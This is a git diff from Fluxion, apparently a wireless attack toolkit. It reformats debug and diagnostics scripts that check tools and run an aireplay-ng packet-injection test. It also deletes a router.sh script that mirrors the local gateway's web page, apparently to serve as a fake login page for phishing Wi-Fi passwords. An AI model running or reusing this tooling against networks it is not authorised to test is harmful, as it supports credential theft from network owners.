8ecf4b3..cd4d8a1 100755 --- a/scripts/debug.sh +++ b/scripts/debug.sh @@ -1,4 +1,6 @@ #!/ bin / bash -export FLUXIONDebug = 1 export FLUXIONWIKillProcesses = - 1 export FLUXIONWIReloadDriver = 1 +# These are the debug flags used by the script +export FLUXIONDebug=1 +export FLUXIONWIKillProcesses=1 +export FLUXIONWIReloadDriver=1 diff --git a/scripts/diagnostics.sh b/scripts/diagnostics.sh index 4439d5f..f766015 100755 --- a/scripts/diagnostics.sh +++ b/scripts/diagnostics.sh @@ -1,66 +1,89 @@ #!/bin/bash -if [ -d "lib" ]; then source lib/InterfaceUtils.sh -elif [ -d "../lib" ]; then source ../lib/InterfaceUtils.sh +clear +declare -r HEADER_SIZE="####" + +# Diagnostic script + +if [ -d "lib" ];then + source lib/InterfaceUtils.sh +elif [ -d "../lib" ];then + source ../lib/InterfaceUtils.sh else - echo "YOU MUST EXECUTE THIS SCRIPT FROM FLUXION'S ROOT!" + echo -e "\033[31mError lib folder not found\033[0m" exit 1 fi if [ ! "$1" ]; then - echo "Usage ./scripts/diagnostics " + echo "Usage ./scripts/diagnostics [wireless_interface]" exit 1 fi -echo "[ FLUXION Info ]" -if [ -f "./fluxion.sh" ] - then declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion.sh)) - else declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion.sh)) +echo "$HEADER_SIZE FLUXION Info" +if [ -f "fluxion" ];then + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion)) +else + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion)) fi echo "FLUXION V${FLUXIONInfo[0]/*=/}.${FLUXIONInfo[1]/*=/}" echo -ne "\n\n" -echo "[ BASH Info ]" +echo "$HEADER_SIZE BASH Info " bash --version -echo "Path: $(ls -L $(which bash))" +echo "**Path:** $(ls -L $(which bash))" echo -ne "\n\n" -echo "[ Interface ($1) Info ]" -if interface_physical "$1"; then echo "Device: $InterfacePhysical" -else echo "Device: Unknown" +echo "$HEADER_SIZE Interface ($1) Info " +if interface_physical "$1";then + echo "**Device**: $InterfacePhysical" +else + echo "**Device:** Unknown" fi -if interface_driver "$1"; then echo "Driver: $InterfaceDriver" -else echo "Driver: Unsupported" +if interface_driver "$1";then + echo "**Driver:** $InterfaceDriver" +else + echo "**Driver:** Unsupported" fi -if interface_chipset "$1"; then echo "Chipset: $InterfaceChipset" -else echo "Chipset: Unknown" +if interface_chipset "$1";then + echo "**Chipset:** $InterfaceChipset" +else + echo "**Chipset:** Unknown" fi -echo -n "Injection Test: " -aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo "failed" +if iw list | grep monitor | head -n 1 | tail -n 1 &>/dev/null;then + echo "**Master Modes** Yes" +else + echo "**Master Modes** No" +fi + +echo -n "**Injection Test:** " +aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo -e "\033[31mFailed\033[0m" echo -ne "\n\n" -echo "[ XTerm Info ]" -echo "Version: $(xterm -version)" -echo "Path: $(ls -L $(which xterm))" +echo "$HEADER_SIZE XTerm Infos" +echo "**Version:** $(xterm -version)" +echo "**Path:** $(ls -L $(which xterm))" echo -n "Test: " if xterm -hold -fg "#FFFFFF" -bg "#000000" -title "XServer/XTerm Test" -e "echo \"XServer/XTerm test: close window to continue...\"" &>/dev/null; then echo "XServer/XTerm success!" -else echo "XServer/XTerm failure!" +else + echo -e "\033[31m XServer/XTerm failure!\033[0m" fi echo -ne "\n\n" -echo "[ HostAPD Info ]" +echo "$HEADER_SIZE HostAPD Info" hostapd -v echo "Path: $(ls -L $(which hostapd))" echo -ne "\n\n" -echo "[ Aircrack-ng Info ]" +echo "$HEADER_SIZE Aircrack-ng Info" aircrack-ng -H | head -n 4 -echo -ne "\n\n" +echo -ne "\n" -echo "[ System Info ]" -if [ -r "/proc/version" ]; then cat /proc/version -else uname -r +echo "$HEADER_SIZE System Info" +if [ -r "/proc/version" ]; then + echo "**Chipset:** $(cat /proc/version)" +else + echo "**Chipset:** $(uname -r)" fi diff --git a/scripts/router.sh b/scripts/router.sh deleted file mode 100755 index 0489105..0000000 --- a/scripts/router.sh +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/bash - -##################################### < CONFIGURATION > ##################################### - -gateway=$(ip route | grep default | awk '{print $3}') - -#Colors -white="\033[1;37m" -red="\033[1;31m" -blue="\033[1;34m" -transparent="\e[0m" - -############################################################################################# - -clear -echo -e "$red[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]" -echo -e "$red Prepare router page." -echo -e "$blue[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]""$transparent" -echo "[i] Prepare dep." - -# Check which package manager is installed -echo "Package Manager" -if hash pacman 2>/dev/null; then - PACK="pacman -S" -else - if hash apt-get 2>/dev/null; then - PACK="apt-get install" - else - if hash yum 2>/dev/null; then - PACK="yum install" - fi - fi -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "Httrack........." -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK httrack -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "cutycapt........" -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK cutycapt -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -if [ ! -d sites ]; then - mkdir sites -fi - -############################################################################################# -echo "[i] Download preview picture" -cutycapt --url=http://$gateway --out=sites/$(date | awk '{print $4}').png -echo "=================================================================================" - -cd sites -echo "[i] Download router site" -httrack $gateway -echo "=================================================================================" -echo "[I] DONE"